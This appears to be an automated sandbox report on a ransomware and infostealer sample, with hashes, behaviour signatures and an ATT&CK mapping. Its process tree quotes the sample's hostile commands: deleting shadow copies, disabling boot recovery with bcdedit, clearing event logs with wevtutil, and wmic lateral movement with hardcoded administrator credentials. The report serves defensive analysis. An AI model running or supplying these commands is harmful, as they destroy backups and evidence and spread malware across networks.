Overview

overview

10

Static

static

8258c53a44...d1.exe

windows7_x64

10

8258c53a44...d1.exe

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    115s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    22-01-2021 10:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe

  • Size

    1.0MB

  • MD5

    3281b2d95e7123a429001400c10ebe28

  • SHA1

    b97308ea9f9c410188d43c34a867fa42c9e9128e

  • SHA256

    8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1

  • SHA512

    2d8829ba0023a0b0f2e3aaa48301f6458fec20e20c019840610f7f862a54615f46de28a5aeb470ae0df5e046d3a8da0310dc29df0b3f60f36ffe4438c469ff11

Score
10/10
evasionransomwarespyware

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Clears Windows event logs 1 TTPs
    evasionransomware
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    ransomware
  • Suspicious use of AdjustPrivilegeToken 187 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
    "C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe"
    1⤵
    • Enumerates connected drives
    • Suspicious use of WriteProcessMemory
    PID:3108
    • C:\Windows\SysWOW64\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2688
    • C:\Windows\SysWOW64\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"'
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3632
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2112
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"
        3⤵
          PID:3912
    • C:\Windows\system32\cmd.exe
      cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3212
      • C:\Windows\System32\Wbem\WMIC.exe
        WMIC.exe shadowcopy delete /nointeractive
        2⤵
          PID:556
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {default} recoveryenabled no
          2⤵
          • Modifies boot configuration data using bcdedit
          PID:2848
        • C:\Windows\system32\bcdedit.exe
          bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
          2⤵
          • Modifies boot configuration data using bcdedit
          PID:2712
      • C:\Windows\system32\cmd.exe
        cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1932
        • C:\Windows\system32\wevtutil.exe
          wevtutil cl "security"
          2⤵
            PID:1096
          • C:\Windows\system32\wevtutil.exe
            wevtutil cl "windows powershell"
            2⤵
              PID:728
            • C:\Windows\system32\wevtutil.exe
              wevtutil cl "security"
              2⤵
                PID:2844
              • C:\Windows\system32\wevtutil.exe
                wevtutil cl "Application"
                2⤵
                  PID:2752
                • C:\Windows\system32\wevtutil.exe
                  wevtutil cl "HardwareEvents"
                  2⤵
                    PID:1764
                  • C:\Windows\system32\wevtutil.exe
                    wevtutil cl "System"
                    2⤵
                      PID:3292
                    • C:\Windows\system32\wevtutil.exe
                      wevtutil cl "Setup"
                      2⤵
                        PID:2060
                      • C:\Windows\system32\wevtutil.exe
                        wevtutil cl "Setup"
                        2⤵
                          PID:2116
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                          PID:1880

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Initial Access

                        Execution

                        Persistence

                        Privilege Escalation

                        Defense Evasion

                        Indicator Removal on Host

                        1
                        T1070

                        File Deletion

                        1
                        T1107

                        Credential Access

                        Credentials in Files

                        1
                        T1081

                        Discovery

                        Query Registry

                        1
                        T1012

                        Peripheral Device Discovery

                        1
                        T1120

                        System Information Discovery

                        2
                        T1082

                        Lateral Movement

                        Collection

                        Data from Local System

                        1
                        T1005

                        Exfiltration

                        Command and Control

                        Impact

                        Inhibit System Recovery

                        2
                        T1490

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • memory/556-4-0x0000000000000000-mapping.dmp
                          Download
                        • memory/728-7-0x0000000000000000-mapping.dmp
                          Download
                        • memory/1096-5-0x0000000000000000-mapping.dmp
                          Download
                        • memory/1764-11-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2060-13-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2112-6-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2116-14-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2688-2-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2712-16-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2752-10-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2844-9-0x0000000000000000-mapping.dmp
                          Download
                        • memory/2848-15-0x0000000000000000-mapping.dmp
                          Download
                        • memory/3292-12-0x0000000000000000-mapping.dmp
                          Download
                        • memory/3632-3-0x0000000000000000-mapping.dmp
                          Download
                        • memory/3912-8-0x0000000000000000-mapping.dmp
                          Download